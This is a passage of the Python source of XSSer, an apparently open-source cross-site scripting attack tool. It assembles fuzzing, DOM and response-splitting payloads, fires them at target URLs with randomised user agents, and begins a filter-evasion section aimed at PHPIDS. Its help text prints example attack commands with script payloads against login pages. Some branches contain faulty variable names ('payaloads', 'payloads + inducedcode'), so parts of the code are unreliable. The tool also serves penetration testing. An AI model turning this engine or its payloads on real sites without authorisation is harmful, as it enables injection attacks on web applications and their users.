main.py 185 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399400401402403404405406407408409410411412413414415416417418419420421422423424425426427428429430431432433434435436437438439440441442443444445446447448449450451452453454455456457458459460461462463464465466467468469470471472473474475476477478479480481482483484485486487488489490491492493494495496497498499500501502503504505506507508509510511512513514515516517518519520521522523524525526527528529530531532533534535536537538539540541542543544545546547548549550551552553554555556557558559560561562563564565566567568569570571572573574575576577578579580581582583584585586587588589590591592593594595596597598599600601602603604605606607608609610611612613614615616617618619620621622623624625626627628629630631632633634635636637638639640641642643644645646647648649650651652653654655656657658659660661662663664665666667668669670671672673674675676677678679680681682683684685686687688689690691692693694695696697698699700701702703704705706707708709710711712713714715716717718719720721722723724725726727728729730731732733734735736737738739740741742743744745746747748749750751752753754755756757758759760761762763764765766767768769770771772773774775776777778779780781782783784785786787788789790791792793794795796797798799800801802803804805806807808809810811812813814815816817818819820821822823824825826827828829830831832833834835836837838839840841842843844845846847848849850851852853854855856857858859860861862863864865866867868869870871872873874875876877878879880881882883884885886887888889890891892893894895896897898899900901902903904905906907908909910911912913914915916917918919920921922923924925926927928929930931932933934935936937938939940941942943944945946947948949950951952953954955956957958959960961962963964965966967968969970971972973974975976977978979980981982983984985986987988989990991992993994995996997998999100010011002100310041005100610071008100910101011101210131014101510161017101810191020102110221023102410251026102710281029103010311032103310341035103610371038103910401041104210431044104510461047104810491050105110521053105410551056105710581059106010611062106310641065106610671068106910701071107210731074107510761077107810791080108110821083108410851086108710881089109010911092109310941095109610971098109911001101110211031104110511061107110811091110111111121113111411151116111711181119112011211122112311241125112611271128112911301131113211331134113511361137113811391140114111421143114411451146114711481149115011511152115311541155115611571158115911601161116211631164116511661167116811691170117111721173117411751176117711781179118011811182118311841185118611871188118911901191119211931194119511961197119811991200120112021203120412051206120712081209121012111212121312141215121612171218121912201221122212231224122512261227122812291230123112321233123412351236123712381239124012411242124312441245124612471248124912501251125212531254125512561257125812591260126112621263126412651266126712681269127012711272127312741275127612771278127912801281128212831284128512861287128812891290129112921293129412951296129712981299130013011302130313041305130613071308130913101311131213131314131513161317131813191320132113221323132413251326132713281329133013311332133313341335133613371338133913401341134213431344134513461347134813491350135113521353135413551356135713581359136013611362136313641365136613671368136913701371137213731374137513761377137813791380138113821383138413851386138713881389139013911392139313941395139613971398139914001401140214031404140514061407140814091410141114121413141414151416141714181419142014211422142314241425142614271428142914301431143214331434143514361437143814391440144114421443144414451446144714481449145014511452145314541455145614571458145914601461146214631464146514661467146814691470147114721473147414751476147714781479148014811482148314841485148614871488148914901491149214931494149514961497149814991500150115021503150415051506150715081509151015111512151315141515151615171518151915201521152215231524152515261527152815291530153115321533153415351536153715381539154015411542154315441545154615471548154915501551155215531554155515561557155815591560156115621563156415651566156715681569157015711572157315741575157615771578157915801581158215831584158515861587158815891590159115921593159415951596159715981599160016011602160316041605160616071608160916101611161216131614161516161617161816191620162116221623162416251626162716281629163016311632163316341635163616371638163916401641164216431644164516461647164816491650165116521653165416551656165716581659166016611662166316641665166616671668166916701671167216731674167516761677167816791680168116821683168416851686168716881689169016911692169316941695169616971698169917001701170217031704170517061707170817091710171117121713171417151716171717181719172017211722172317241725172617271728172917301731173217331734173517361737173817391740174117421743174417451746174717481749175017511752175317541755175617571758175917601761176217631764176517661767176817691770177117721773177417751776177717781779178017811782178317841785178617871788178917901791179217931794179517961797179817991800180118021803180418051806180718081809181018111812181318141815181618171818181918201821182218231824182518261827182818291830183118321833183418351836183718381839184018411842184318441845184618471848184918501851185218531854185518561857185818591860186118621863186418651866186718681869187018711872187318741875187618771878187918801881188218831884188518861887188818891890189118921893189418951896189718981899190019011902190319041905190619071908190919101911191219131914191519161917191819191920192119221923192419251926192719281929193019311932193319341935193619371938193919401941194219431944194519461947194819491950195119521953195419551956195719581959196019611962196319641965196619671968196919701971197219731974197519761977197819791980198119821983198419851986198719881989199019911992199319941995199619971998199920002001200220032004200520062007200820092010201120122013201420152016201720182019202020212022202320242025202620272028202920302031203220332034203520362037203820392040204120422043204420452046204720482049205020512052205320542055205620572058205920602061206220632064206520662067206820692070207120722073207420752076207720782079208020812082208320842085208620872088208920902091209220932094209520962097209820992100210121022103210421052106210721082109211021112112211321142115211621172118211921202121212221232124212521262127212821292130213121322133213421352136213721382139214021412142214321442145214621472148214921502151215221532154215521562157215821592160216121622163216421652166216721682169217021712172217321742175217621772178217921802181218221832184218521862187218821892190219121922193219421952196219721982199220022012202220322042205220622072208220922102211221222132214221522162217221822192220222122222223222422252226222722282229223022312232223322342235223622372238223922402241224222432244224522462247224822492250225122522253225422552256225722582259226022612262226322642265226622672268226922702271227222732274227522762277227822792280228122822283228422852286228722882289229022912292229322942295229622972298229923002301230223032304230523062307230823092310231123122313231423152316231723182319232023212322232323242325232623272328232923302331233223332334233523362337233823392340234123422343234423452346234723482349235023512352235323542355235623572358235923602361236223632364236523662367236823692370237123722373237423752376237723782379238023812382238323842385238623872388238923902391239223932394239523962397239823992400240124022403240424052406240724082409241024112412241324142415241624172418241924202421242224232424242524262427242824292430243124322433243424352436243724382439244024412442244324442445244624472448244924502451245224532454245524562457245824592460246124622463246424652466246724682469247024712472247324742475247624772478247924802481248224832484248524862487248824892490249124922493249424952496249724982499250025012502250325042505250625072508250925102511251225132514251525162517251825192520252125222523252425252526252725282529253025312532253325342535253625372538253925402541254225432544254525462547254825492550255125522553255425552556255725582559256025612562256325642565256625672568256925702571257225732574257525762577257825792580258125822583258425852586258725882589259025912592259325942595259625972598259926002601260226032604260526062607260826092610261126122613261426152616261726182619262026212622262326242625262626272628262926302631263226332634263526362637263826392640264126422643264426452646264726482649265026512652265326542655265626572658265926602661266226632664266526662667266826692670267126722673267426752676267726782679268026812682268326842685268626872688268926902691269226932694269526962697269826992700270127022703270427052706270727082709271027112712271327142715271627172718271927202721272227232724272527262727272827292730273127322733273427352736273727382739274027412742274327442745274627472748274927502751275227532754275527562757275827592760276127622763276427652766276727682769277027712772277327742775277627772778277927802781278227832784278527862787278827892790279127922793279427952796279727982799280028012802280328042805280628072808280928102811281228132814281528162817281828192820282128222823282428252826282728282829283028312832283328342835283628372838283928402841284228432844284528462847284828492850285128522853285428552856285728582859286028612862286328642865286628672868286928702871287228732874287528762877287828792880288128822883288428852886288728882889289028912892289328942895289628972898289929002901290229032904290529062907290829092910291129122913291429152916291729182919292029212922292329242925292629272928292929302931293229332934293529362937293829392940294129422943294429452946294729482949295029512952295329542955295629572958295929602961296229632964296529662967296829692970297129722973297429752976297729782979298029812982298329842985298629872988298929902991299229932994299529962997299829993000300130023003300430053006300730083009301030113012301330143015301630173018301930203021302230233024302530263027302830293030303130323033303430353036303730383039304030413042304330443045304630473048304930503051305230533054305530563057305830593060306130623063306430653066306730683069307030713072307330743075307630773078307930803081308230833084308530863087308830893090309130923093309430953096309730983099310031013102310331043105310631073108310931103111311231133114311531163117311831193120312131223123312431253126312731283129313031313132313331343135313631373138313931403141314231433144314531463147314831493150315131523153315431553156315731583159316031613162316331643165316631673168316931703171317231733174317531763177317831793180318131823183318431853186318731883189319031913192319331943195319631973198319932003201320232033204320532063207320832093210321132123213321432153216321732183219322032213222322332243225322632273228322932303231323232333234323532363237323832393240324132423243324432453246324732483249325032513252325332543255325632573258325932603261326232633264326532663267326832693270327132723273327432753276327732783279328032813282328332843285328632873288328932903291329232933294329532963297329832993300330133023303330433053306330733083309331033113312331333143315331633173318331933203321332233233324332533263327332833293330333133323333333433353336333733383339334033413342334333443345334633473348334933503351335233533354335533563357335833593360336133623363336433653366336733683369337033713372337333743375337633773378337933803381338233833384338533863387338833893390339133923393339433953396339733983399340034013402340334043405340634073408340934103411341234133414341534163417341834193420342134223423342434253426342734283429343034313432343334343435343634373438343934403441344234433444344534463447344834493450345134523453345434553456345734583459346034613462346334643465346634673468346934703471347234733474347534763477347834793480348134823483348434853486348734883489349034913492349334943495349634973498349935003501350235033504350535063507350835093510351135123513351435153516351735183519352035213522352335243525352635273528
  1. #!/usr/bin/env python
  2. # -*- coding: utf-8 -*-"
  3. # vim: set expandtab tabstop=4 shiftwidth=4:
  4. """
  5. This file is part of the XSSer project, https://xsser.03c8.net
  6. Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
  7. xsser is free software; you can redistribute it and/or modify it under
  8. the terms of the GNU General Public License as published by the Free
  9. Software Foundation version 3 of the License.
  10. xsser is distributed in the hope that it will be useful, but WITHOUT ANY
  11. WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
  12. FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
  13. details.
  14. You should have received a copy of the GNU General Public License along
  15. with xsser; if not, write to the Free Software Foundation, Inc., 51
  16. Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
  17. """
  18. import os, re, sys, datetime, hashlib, time, urllib.request, urllib.parse, urllib.error, cgi, traceback, webbrowser, random
  19. from random import randint
  20. from base64 import b64encode, b64decode
  21. import core.fuzzing
  22. import core.fuzzing.vectors
  23. import core.fuzzing.DCP
  24. import core.fuzzing.DOM
  25. import core.fuzzing.HTTPsr
  26. import core.fuzzing.heuristic
  27. from collections import defaultdict
  28. from itertools import islice, chain
  29. from urllib.parse import parse_qs, urlparse
  30. from core.curlcontrol import Curl
  31. from core.encdec import EncoderDecoder
  32. from core.options import XSSerOptions
  33. from core.dork import Dorker
  34. from core.crawler import Crawler
  35. from core.imagexss import ImageInjections
  36. from core.flashxss import FlashInjections
  37. from core.post.xml_exporter import xml_reporting
  38. from core.tokenhub import HubThread
  39. from core.reporter import XSSerReporter
  40. from core.threadpool import ThreadPool, NoResultsPending
  41. from core.update import Updater
  42. # set to emit debug messages about errors (0 = off).
  43. DEBUG = 0
  44. class xsser(EncoderDecoder, XSSerReporter):
  45. """
  46. XSSer application class
  47. """
  48. def __init__(self, mothership=None):
  49. self._reporter = None
  50. self._reporters = []
  51. self._landing = False
  52. self._ongoing_requests = 0
  53. self._oldcurl = []
  54. self._gtkdir = None
  55. self._webbrowser = webbrowser
  56. self.crawled_urls = []
  57. self.checked_urls = []
  58. self.successful_urls = []
  59. self.urlmalformed = False
  60. self.search_engines = [] # available dorking search engines
  61. self.search_engines.append('bing') # [26/08/2019: OK!]
  62. self.search_engines.append('yahoo') # [26/08/2019: OK!]
  63. self.search_engines.append('startpage') # [26/08/2019: OK!]
  64. self.search_engines.append('duck') # [26/08/2019: OK!]
  65. #self.search_engines.append('google')
  66. #self.search_engines.append('yandex')
  67. self.user_template = None # wizard user template
  68. self.user_template_conntype = "GET" # GET by default
  69. self.check_tor_url = 'https://check.torproject.org/' # TOR status checking site
  70. if not mothership:
  71. # no mothership so *this* is the mothership
  72. # start the communications hub and rock on!
  73. self.hub = None
  74. self.pool = ThreadPool(0)
  75. self.mothership = None
  76. self.final_attacks = {}
  77. else:
  78. self.hub = None
  79. self.mothership = mothership
  80. self.mothership.add_reporter(self)
  81. self.pool = ThreadPool(0)
  82. self.final_attacks = self.mothership.final_attacks
  83. # initialize the url encoder/decoder
  84. EncoderDecoder.__init__(self)
  85. # your unique real opponent
  86. self.time = datetime.datetime.now()
  87. # this payload comes with vector already..
  88. self.DEFAULT_XSS_PAYLOAD = 'XSS'
  89. # to be or not to be...
  90. self.hash_found = []
  91. self.hash_notfound = []
  92. # other hashes
  93. self.hashed_injections={}
  94. self.extra_hashed_injections={}
  95. self.extra_hashed_vector_url = {}
  96. self.final_hashes = {} # final hashes used by each method
  97. # some counters for checker systems
  98. self.errors_isalive = 0
  99. self.next_isalive = False
  100. self.flag_isalive_num = 0
  101. self.rounds = 0
  102. self.round_complete = 0
  103. # some controls about targets
  104. self.urlspoll = []
  105. # some statistics counters for connections
  106. self.success_connection = 0
  107. self.not_connection = 0
  108. self.forwarded_connection = 0
  109. self.other_connection = 0
  110. # some statistics counters for payloads
  111. self.xsr_injection = 0
  112. self.xsa_injection = 0
  113. self.coo_injection = 0
  114. self.manual_injection = 0
  115. self.auto_injection = 0
  116. self.dcp_injection = 0
  117. self.dom_injection = 0
  118. self.httpsr_injection = 0
  119. self.check_positives = 0
  120. # some statistics counters for injections found
  121. self.xsr_found = 0
  122. self.xsa_found = 0
  123. self.coo_found = 0
  124. self.manual_found = 0
  125. self.auto_found = 0
  126. self.dcp_found = 0
  127. self.dom_found = 0
  128. self.httpsr_found = 0
  129. self.false_positives = 0
  130. # some statistics counters for heuristic parameters
  131. self.heuris_hashes = []
  132. self.heuris_backslash_found = 0
  133. self.heuris_une_backslash_found = 0
  134. self.heuris_dec_backslash_found = 0
  135. self.heuris_backslash_notfound = 0
  136. self.heuris_slash_found = 0
  137. self.heuris_une_slash_found = 0
  138. self.heuris_dec_slash_found = 0
  139. self.heuris_slash_notfound = 0
  140. self.heuris_mayor_found = 0
  141. self.heuris_une_mayor_found = 0
  142. self.heuris_dec_mayor_found = 0
  143. self.heuris_mayor_notfound = 0
  144. self.heuris_minor_found = 0
  145. self.heuris_une_minor_found = 0
  146. self.heuris_dec_minor_found = 0
  147. self.heuris_minor_notfound = 0
  148. self.heuris_semicolon_found = 0
  149. self.heuris_une_semicolon_found = 0
  150. self.heuris_dec_semicolon_found = 0
  151. self.heuris_semicolon_notfound = 0
  152. self.heuris_colon_found = 0
  153. self.heuris_une_colon_found = 0
  154. self.heuris_dec_colon_found = 0
  155. self.heuris_colon_notfound = 0
  156. self.heuris_doublecolon_found = 0
  157. self.heuris_une_doublecolon_found = 0
  158. self.heuris_dec_doublecolon_found = 0
  159. self.heuris_doublecolon_notfound = 0
  160. self.heuris_equal_found = 0
  161. self.heuris_une_equal_found = 0
  162. self.heuris_dec_equal_found = 0
  163. self.heuris_equal_notfound = 0
  164. # xsser verbosity (0 - no output, 1 - dots only, 2+ - real verbosity)
  165. self.verbose = 2
  166. self.options = None
  167. def __del__(self):
  168. if not self._landing:
  169. self.land()
  170. def get_gtk_directory(self):
  171. if self._gtkdir:
  172. return self._gtkdir
  173. local_path = os.path.join(os.path.dirname(os.path.dirname(__file__)),
  174. 'gtk')
  175. if os.path.exists(local_path):
  176. self._gtkdir = local_path
  177. return self._gtkdir
  178. elif os.path.exists('/usr/share/xsser/gtk'):
  179. self._gtkdir = '/usr/share/xsser/gtk'
  180. return self._gtkdir
  181. def set_webbrowser(self, browser):
  182. self._webbrowser = browser
  183. def set_reporter(self, reporter):
  184. self._reporter = reporter
  185. def add_reporter(self, reporter):
  186. self._reporters.append(reporter)
  187. def remove_reporter(self, reporter):
  188. if reporter in self._reporters:
  189. self._reporters.remove(reporter)
  190. def generate_hash(self, attack_type='default'):
  191. """
  192. Generate a new hash for a type of attack.
  193. """
  194. date = str(datetime.datetime.now())
  195. encoded_hash = date + attack_type
  196. return hashlib.md5(encoded_hash.encode('utf-8')).hexdigest()
  197. def generate_numeric_hash(self): # 32 length as md5
  198. """
  199. Generate a new hash for numeric only XSS
  200. """
  201. newhash = ''.join(random.choice('0123456789') for i in range(32))
  202. return newhash
  203. def report(self, msg, level='info'):
  204. """
  205. Report some error from the application.
  206. levels: debug, info, warning, error
  207. """
  208. if self.verbose == 2:
  209. prefix = ""
  210. if level != 'info':
  211. prefix = "["+level+"] "
  212. print(msg)
  213. elif self.verbose:
  214. if level == 'error':
  215. sys.stdout.write("*")
  216. else:
  217. sys.stdout.write(".")
  218. for reporter in self._reporters:
  219. reporter.post(msg)
  220. if self._reporter:
  221. from twisted.internet import reactor
  222. reactor.callFromThread(self._reporter.post, msg)
  223. def set_options(self, options):
  224. """
  225. Set xsser options
  226. """
  227. self.options = options
  228. self._opt_request()
  229. def _opt_request(self):
  230. """
  231. Pass on some properties to Curl
  232. """
  233. options = self.options
  234. for opt in ['cookie', 'agent', 'referer',\
  235. 'headers', 'atype', 'acred', 'acert',
  236. 'proxy', 'ignoreproxy', 'timeout',
  237. 'delay', 'tcp_nodelay', 'retries',
  238. 'xforw', 'xclient', 'threads',
  239. 'dropcookie', 'followred', 'fli',
  240. 'nohead', 'isalive', 'alt', 'altm',
  241. 'ald'
  242. ]:
  243. if hasattr(options, opt) and getattr(options, opt):
  244. setattr(Curl, opt, getattr(options, opt))
  245. def get_payloads(self):
  246. """
  247. Process payload options and make up the payload list for the attack.
  248. """
  249. options = self.options
  250. # payloading sources for --auto
  251. payloads_fuzz = core.fuzzing.vectors.vectors
  252. if options.fzz_info or options.fzz_num or options.fzz_rand and not options.fuzz:
  253. self.options.fuzz = True
  254. # set a type for XSS auto-fuzzing vectors
  255. if options.fzz_info:
  256. fzz_payloads = []
  257. for fuzz in payloads_fuzz:
  258. if not fuzz["browser"] == "[Not Info]":
  259. fzz_payloads.append(fuzz)
  260. payloads_fuzz = fzz_payloads
  261. # set a limit for XSS auto-fuzzing vectors
  262. if options.fzz_num:
  263. try:
  264. options.fzz_num = int(options.fzz_num)
  265. except:
  266. options.fzz_num = len(payloads_fuzz)
  267. fzz_num_payloads = []
  268. fzz_vector = 0
  269. for fuzz in payloads_fuzz:
  270. fzz_vector = fzz_vector + 1
  271. if int(fzz_vector) < int(options.fzz_num)+1:
  272. fzz_num_payloads.append(fuzz)
  273. payloads_fuzz = fzz_num_payloads
  274. # set random order for XSS auto-fuzzing vectors
  275. if options.fzz_rand:
  276. try:
  277. from random import shuffle
  278. shuffle(payloads_fuzz) # shuffle paylods
  279. except:
  280. pass
  281. payloads_dcp = core.fuzzing.DCP.DCPvectors
  282. payloads_dom = core.fuzzing.DOM.DOMvectors
  283. payloads_httpsr = core.fuzzing.HTTPsr.HTTPrs_vectors
  284. manual_payload = [{"payload":options.script, "browser":"[manual_injection]"}]
  285. # sustitute payload for hash to check for false positives
  286. self.hashed_payload = "XSS"
  287. checker_payload = [{"payload":self.hashed_payload, "browser":"[hashed_precheck_system]"}]
  288. # heuristic parameters
  289. heuristic_params = core.fuzzing.heuristic.heuristic_test
  290. def enable_options_heuristic(payloads):
  291. if options.heuristic:
  292. payloads = heuristic_params + payloads
  293. if options.dom:
  294. payloads = payloads + payloads_dom
  295. return payloads
  296. if options.fuzz:
  297. payloads = payloads_fuzz
  298. if options.dcp:
  299. payloads = payloads + payloads_dcp
  300. if options.script:
  301. payloads = payloads + manual_payload
  302. if options.hash:
  303. payloads = checker_payload + payloads
  304. if options.inducedcode:
  305. payloads = payloads + payloads_httpsr
  306. if options.heuristic:
  307. payloads = heuristic_params + payloads
  308. if options.dom:
  309. payloads = payloads + payloads_dom
  310. elif options.inducedcode:
  311. payloads = payloads + payloads_httpsr
  312. if options.heuristic:
  313. payloads = heuristic_params + payloads
  314. if options.dom:
  315. payloads = payloads + payloads_dom
  316. elif options.dom:
  317. payloads = payloads + payloads_dom
  318. elif options.heuristic:
  319. payloads = heuristic_params + payloads
  320. if options.dom:
  321. payloads = payloads + payloads_dom
  322. elif options.dom:
  323. payloads = payloads + payloads_dom
  324. elif options.hash:
  325. payloads = checker_payload + payloads
  326. if options.inducedcode:
  327. payloads = payloads + payloads_httpsr
  328. if options.heuristic:
  329. payloads = heuristic_params + payloads
  330. if options.dom:
  331. payloads = payloads + payloads_dom
  332. elif options.dom:
  333. payloads = payloads + payloads_dom
  334. elif options.inducedcode:
  335. payloads = payloads + payloads_httpsr
  336. if options.heuristic:
  337. payloads = heuristic_params + payloads
  338. if options.dom:
  339. payloads = payloads + payloads_dom
  340. elif options.dom:
  341. payloads = payloads + payloads_dom
  342. elif options.script:
  343. payloads = payloads + manual_payload
  344. if options.hash:
  345. payloads = checker_payload + payloads
  346. if options.inducedcode:
  347. payloads = payaloads + payloads_httpsr
  348. if options.heuristic:
  349. payloads = heuristic_params + payloads
  350. if options.dom:
  351. payloads = payloads + payloads_dom
  352. elif options.hash:
  353. payloads = checker_payload + payloads
  354. if options.inducedcode:
  355. payloads = payloads + payloads_httpsr
  356. if options.heuristic:
  357. payloads = heuristic_params + payloads
  358. if options.dom:
  359. payloads = payloads + payloads_dom
  360. elif options.dom:
  361. payloads = payloads + payloads_dom
  362. elif options.heuristic:
  363. payloads = heuristic_params + payloads
  364. if options.dom:
  365. payloads = payloads + payloads_dom
  366. elif options.dom:
  367. payloads = payloads + payloads_dom
  368. elif options.inducedcode:
  369. payloads = payloads + payloads_httpsr
  370. if options.hash:
  371. payloads = checker_payload + payloads
  372. if options.heuristic:
  373. payloads = heuristic_params + payloads
  374. if options.dom:
  375. payloads = payloads + payloads_dom
  376. elif options.dom:
  377. payloads = payloads + payloads_dom
  378. elif options.heuristic:
  379. payloads = heuristic_params + payloads
  380. if options.dom:
  381. payloads = payloads + payloads_dom
  382. elif options.dom:
  383. payloads = payloads + payloads_dom
  384. elif options.dcp:
  385. payloads = payloads_dcp
  386. if options.script:
  387. payloads = payloads + manual_payload
  388. if options.hash:
  389. payloads = checker_payload + payloads
  390. if options.inducedcode:
  391. payloads = payloads + payloads_httpsr
  392. if options.heuristic:
  393. payloads = heuristic_params + payloads
  394. if options.dom:
  395. payloads = payloads + payloads_dom
  396. elif options.hash:
  397. payloads = checker_payload + payloads
  398. if options.inducedcode:
  399. payloads = payloads + inducedcode
  400. if options.heuristic:
  401. payloads = heuristic_params + payloads
  402. if options.dom:
  403. payloads = payloads + payloads_dom
  404. elif options.dom:
  405. payloads = payloads + payloads_dom
  406. elif options.inducedcode:
  407. payloads = payloads + payloads_httpsr
  408. if options.heuristic:
  409. payloads = heuristic_params + payloads
  410. if options.dom:
  411. payloads = payloads + payloads_dom
  412. elif options.dom:
  413. payloads = payloads + payloads_dom
  414. elif options.heuristic:
  415. payloads = heuristic_params + payloads
  416. if options.dom:
  417. payloads = payloads + payloads_dom
  418. elif options.dom:
  419. payloads = payloads + payloads_dom
  420. elif options.script:
  421. payloads = manual_payload
  422. if options.hash:
  423. payloads = checker_payload + payloads
  424. if options.inducedcode:
  425. payloads = payloads + payloads_httpsr
  426. if options.heuristic:
  427. payloads = heuristic_params + payloads
  428. if options.dom:
  429. payloads = payloads + payloads_dom
  430. elif options.inducedcode:
  431. payloads = payloads + payloads_httpsr
  432. if options.heuristic:
  433. payloads = heuristic_params + payloads
  434. if options.dom:
  435. payloads = payloads + payloads_dom
  436. elif options.dom:
  437. payloads = payloads + payloads_dom
  438. elif options.heuristic:
  439. payloads = heuristic_params + payloads
  440. if options.dom:
  441. paylaods = payloads + payloads_dom
  442. elif options.dom:
  443. payloads = payloads + payloads_dom
  444. elif options.inducedcode:
  445. payloads = payloads_httpsr
  446. if options.hash:
  447. payloads = checker_payload + payloads
  448. if options.heuristic:
  449. payloads = heuristic_params + payloads
  450. if options.dom:
  451. payloads = payloads + payloads_dom
  452. elif options.heuristic:
  453. payloads = heuristic_params + payloads
  454. if options.dom:
  455. payloads = payloads + payloads_dom
  456. elif options.dom:
  457. payloads = payloads + payloads_dom
  458. elif options.heuristic:
  459. payloads = heuristic_params
  460. if options.hash:
  461. payloads = checker_payload + payloads
  462. if options.dom:
  463. payloads = payloads + payloads_dom
  464. elif options.dom:
  465. payloads = payloads + payloads_dom
  466. elif options.dom:
  467. payloads = payloads_dom
  468. elif not options.fuzz and not options.dcp and not options.script and not options.hash and not options.inducedcode and not options.heuristic and not options.dom:
  469. payloads = [{"payload":'">PAYLOAD',
  470. "browser":"[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"
  471. }]
  472. else:
  473. payloads = checker_payload
  474. return payloads
  475. def process_ipfuzzing(self, text):
  476. """
  477. Mask ips in given text to DWORD
  478. """
  479. ips = re.findall("\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}", text)
  480. for ip in ips:
  481. text = text.replace(ip, str(self._ipDwordEncode(ip)))
  482. return text
  483. def process_ipfuzzing_octal(self, text):
  484. """
  485. Mask ips in given text to Octal
  486. """
  487. ips = re.findall("\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}", text)
  488. for ip in ips:
  489. text = text.replace(ip, str(self._ipOctalEncode(ip)))
  490. return text
  491. def process_payloads_ipfuzzing(self, payloads):
  492. """
  493. Mask ips for all given payloads using DWORD
  494. """
  495. # ip fuzzing (DWORD)
  496. if self.options.Dwo:
  497. resulting_payloads = []
  498. for payload in payloads:
  499. payload["payload"] = self.process_ipfuzzing(payload["payload"])
  500. resulting_payloads.append(payload)
  501. return resulting_payloads
  502. return payloads
  503. def process_payloads_ipfuzzing_octal(self, payloads):
  504. """
  505. Mask ips for all given payloads using OCTAL
  506. """
  507. # ip fuzzing (OCTAL)
  508. if self.options.Doo:
  509. resulting_payloads = []
  510. for payload in payloads:
  511. payload["payload"] = self.process_ipfuzzing_octal(payload["payload"])
  512. resulting_payloads.append(payload)
  513. return resulting_payloads
  514. return payloads
  515. def get_query_string(self):
  516. """
  517. Get the supplied query string.
  518. """
  519. if self.options.postdata:
  520. return self.options.postdata
  521. elif self.options.getdata:
  522. return self.options.getdata
  523. return ""
  524. def attack_url(self, url, payloads, query_string):
  525. """
  526. Attack the given url checking or not if is correct.
  527. """
  528. if not self.options.nohead:
  529. for payload in payloads:
  530. self.rounds = self.rounds + 1
  531. self.attack_url_payload(url, payload, query_string)
  532. else:
  533. hc = Curl()
  534. try:
  535. urls = hc.do_head_check([url])
  536. except:
  537. self.report("[Error] Target URL: (" + url + ") is malformed!" + " [DISCARDED]" + "\n")
  538. return
  539. self.report("-"*50 + "\n")
  540. if str(hc.info()["http-code"]) in ["200", "302", "301", "401"]:
  541. if str(hc.info()["http-code"]) in ["301"]:
  542. url = str(hc.info()["Location"])
  543. payload = ""
  544. query_string = ""
  545. elif str(hc.info()["http-code"]) in ["302"]:
  546. url = url + "/"
  547. payload = ""
  548. query_string = ""
  549. self.success_connection = self.success_connection + 1
  550. self.report("[Info] HEAD-CHECK: OK! [HTTP-" + hc.info()["http-code"] + "] -> [AIMED]\n")
  551. for payload in payloads:
  552. self.attack_url_payload(url, payload, query_string)
  553. else:
  554. if str(hc.info()["http-code"]) in ["405"]:
  555. self.report("[Info] HEAD-CHECK: NOT ALLOWED! [HTTP-" + hc.info()["http-code"] + "] -> [PASSING]\n")
  556. self.success_connection = self.success_connection + 1
  557. for payload in payloads:
  558. self.attack_url_payload(url, payload, query_string)
  559. else:
  560. self.not_connection = self.not_connection + 1
  561. self.report("[Error] HEAD-CHECK: FAILED! [HTTP-" + hc.info()["http-code"] + "] -> [DISCARDED]\n")
  562. self.report("-"*50 + "\n")
  563. def not_keyword_exit(self):
  564. self.report("="*30)
  565. self.report("\n[Error] XSSer cannot find a correct place to start an attack. Aborting!...\n")
  566. self.report("-"*25)
  567. self.report("\n[Info] This is because you aren't providing:\n\n At least one -payloader- using a keyword: 'XSS' (for hex.hash) or 'X1S' (for int.hash):\n")
  568. self.report(" - ex (GET): xsser -u 'https://target.com' -g '/path/profile.php?username=bob&surname=XSS&age=X1S&job=XSS'")
  569. self.report(" - ex (POST): xsser -u 'https://target.com/login.php' -p 'username=bob&password=XSS&captcha=X1S'\n")
  570. self.report(" Any extra attack(s) (Xsa, Xsr, Coo, Dorker, Crawler...):\n")
  571. self.report(" - ex (GET+Cookie): xsser -u 'https://target.com' -g '/path/id.php?=2' --Coo")
  572. self.report(" - ex (POST+XSA+XSR+Cookie): xsser -u 'https://target.com/login.php' -p 'username=admin&password=admin' --Xsa --Xsr --Coo")
  573. self.report(" - ex (Dorker): xsser -d 'news.php?id=' --Da")
  574. self.report(" - ex (Crawler): xsser -u 'https://target.com' -c 100 --Cl\n")
  575. self.report(" Or a mixture:\n")
  576. self.report(" - ex (GET+Manual): xsser -u 'https://target.com' -g '/users/profile.php?user=XSS&salary=X1S' --payload='<script>alert(XSS);</script>'")
  577. self.report(" - ex (POST+Manual): xsser -u 'https://target.com/login.asp' -p 'username=bob&password=XSS' --payload='}}%%&//<sc&ri/pt>(XSS)--;>'\n")
  578. self.report(" - ex (GET+Cookie): xsser -u 'https://target.com' -g '/login.asp?user=bob&password=XSS' --Coo")
  579. self.report(" - ex (POST+XSR+XSA): xsser -u 'https://target.com/login.asp' -p 'username=bob&password=XSS' --Xsr --Xsa\n")
  580. self.report("="*75 + "\n")
  581. if not self.options.xsser_gtk:
  582. sys.exit(2)
  583. else:
  584. pass
  585. def get_url_payload(self, url, payload, query_string, user_attack_payload):
  586. """
  587. Attack the given url with the given payload
  588. """
  589. options = self.options
  590. self._ongoing_attacks = {}
  591. if (self.options.xsa or self.options.xsr or self.options.coo):
  592. agent, referer, cookie = self._prepare_extra_attacks(payload)
  593. else:
  594. agents = [] # user-agents
  595. try:
  596. f = open("core/fuzzing/user-agents.txt").readlines() # set path for user-agents
  597. except:
  598. f = open("fuzzing/user-agents.txt").readlines() # set path for user-agents when testing
  599. for line in f:
  600. agents.append(line)
  601. agent = random.choice(agents).strip() # set random user-agent
  602. referer = "127.0.0.1"
  603. cookie = None
  604. if options.agent:
  605. agent = options.agent
  606. else:
  607. self.options.agent = agent
  608. if options.referer:
  609. referer = options.referer
  610. else:
  611. self.options.referer = referer
  612. if options.cookie:
  613. cookie = options.cookie
  614. else:
  615. self.options.cookie = cookie
  616. # get payload/vector
  617. payload_string = payload['payload'].strip()
  618. ### Anti-antiXSS exploits
  619. # PHPIDS (>0.6.5) [ALL] -> 32*payload + payload
  620. if options.phpids065:
